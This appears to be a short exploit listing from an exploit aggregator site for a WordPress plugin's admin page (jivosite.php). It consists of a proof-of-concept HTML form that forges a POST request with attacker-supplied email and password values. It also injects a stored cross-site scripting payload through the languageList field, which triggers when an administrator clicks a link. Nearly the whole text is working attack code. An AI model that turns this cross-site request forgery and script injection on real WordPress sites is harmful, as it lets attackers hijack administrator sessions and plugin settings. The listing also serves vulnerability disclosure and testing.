Share
## https://sploitus.com/exploit?id=WPEX-ID:099CF9B4-0B3A-43C6-8CA9-7C2D50F86425
<html>
<body>
<form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php">
<input type="hidden" name="email" value="attacker@example.com"/>
<input type="hidden" name="userPassword" value="Test123"/>
<input type="hidden" name="userDisplayName" value="test123"/>
<input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/>
<input type="submit" value="Submit">
</form>
</body>
<html>
XSS will be triggered when admin click "Go to Web Application"